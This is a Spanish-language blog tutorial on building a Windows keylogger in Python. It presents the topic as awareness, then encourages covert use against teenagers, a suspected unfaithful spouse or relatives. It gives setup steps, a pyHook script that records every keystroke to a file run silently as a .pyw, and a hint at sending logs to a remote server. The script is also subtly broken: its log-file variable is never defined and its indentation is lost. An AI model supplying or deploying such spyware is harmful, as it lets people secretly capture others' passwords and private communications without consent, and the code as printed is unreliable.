Saltar al contenido

¿Cómo crear un keylogger?

Son muchas las personas que a diario me formulan preguntas de como crear un keylogger. Por lo tanto, a lo largo de este artículo trataré de resolver dicha duda. Y, es que un keylogger, traducido como “registrador de teclas” en español, es básicamente un programa que permita registrar cada una de las teclas que son apretada por un intervalo de tiempo.

Este software es sumamente peligroso y es muy común en el mundo de los hackers. Por medio de esas pulsaciones, los expertos en delitos informáticos  pueden robar información confidencial como contraseñas, cuentas bancarias y números de tarjetas de crédito y con ellos pueden desde vaciar una cuenta hasta suplantar identidad en las redes sociales para ofrecer dólares. Es fundamental estar informado acerca de las funciones de un keylogger para evitar caer en la trampa de estos ciberdelincuentes. Además, os mostraremos como crear un keylogger para que sepas la metodología que este tipo de hackers siguen.

como crear keylogger

¿Cómo funciona?

Sin embargo, un keylogger puede ser utilizado con otro objetivo completamente diferente. Las redes sociales se han convertido en un arma de doble filo, especialmente para los menores de edad de los que, si no se les da la suficiente educación y supervisión, pueden ser víctimas de pederastas, y más aún en estos tiempos cuando en los últimos meses se ha estado escuchando el polémico movimiento MAP, conformado por un grupo de adultos que sienten atracción sexual por niños y adolescentes.

Otra razón por la que puedes implementarlo en el ordenador de la casa es para vigilar si tus hijos adolescentes están visitando páginas pornográficas y atender ese mal hábito a tiempo si es detectado gracias a esto, pues le puede causar severas consecuencias psicológicas, emocionales, sociales y morales. O probablemente sospechas que tu cónyuge te está engañando con otra persona. O puede ser que algún familiar que reside contigo está ejecutando actividades ilícitas.

Si deseas optar por crear uno, debes usar un lenguaje de programación. Uno de ellos es Python, el cual es fácil y rápido de manejar. Para ello se recomienda tener por lo menos conocimientos básicos de programación. Si no sabes nada, puedes buscar “Programación 101” en Google. 

Es importante mencionar que en Python existen diversos módulos que te pueden ayudar a crear el script. Estos consisten en pequeños códigos que proveen ciertas funciones para realizar determinadas tareas.

Crear keylogger con Python

Crear un keylogger para Windows en Python es una tarea sumamente fácil, es por ello que a continuación os explicaremos los pasos que debes seguir para

  • Ingresa a https://www.python.org/getit/ y baja a versión más reciente. 
  • Instala los módulos PyHook y Pywin32 que tienen la misma versión de Python y están en el portal del lenguaje de programación que estás usando.
  • Elige la opción “Instalar para todos los usuarios”.
  • Selecciona “Agregar Python.exe”.
  • Una vez instalado, abre el editor de Python.
  • Abre el block de notas, Microsoft Visual Studio Code o el propio editor de Python, copia y pega este script:

</pre>

import pyHook, pythoncom, sys, logging

# feel free to set the file_log to a different file name/location

def OnKeyboardEvent(event):

logging.basicConfig(filename=file_log, level=logging.DEBUG, format=’%(message)s’)

chr(event.Ascii)

logging.log(10,chr(event.Ascii))

return True

hooks_manager = pyHook.HookManager()

hooks_manager.KeyDown = OnKeyboardEvent

hooks_manager.HookKeyboard()

pythoncom.PumpMessages()

<pre>

  • Guarda el archivo bajo el nombre de “keylogger” y usa la extensión .pyw, en este contexto “keylogger.pyw”.
  • Haz doble click en el archivo para que inicie la captura de todos los movimientos del teclado.

A partir de ahora puedes vigilar todas las pulsaciones de tu equipo. Así sabrás si un tercero lo  usó sin tu permiso. Cabe destacar que estas se irán guardando en el fichero “keyloggeroutput.txt” que estará en el mismo directorio que el keylogger. Ábrelo para saber cómo se han registrado.

En conclusión, esta herramienta tendrá características similares al Revealer Keylogger, por lo que tendréis entre vuestras manos un dispositivo de alta calidad.

Cómo apagarlo de manera forzada

  • Abre el administrador de tareas usando la combinación Control+Alt+Supr.
  • Concluye el proceso de Python.

Si usas una versión más avanzada, debes tener cierto grado de conocimientos para controlar el keylogger de manera remota o lograr que esta herramienta se conecte a un servidor donde se cuelgue el fichero con el registro completo.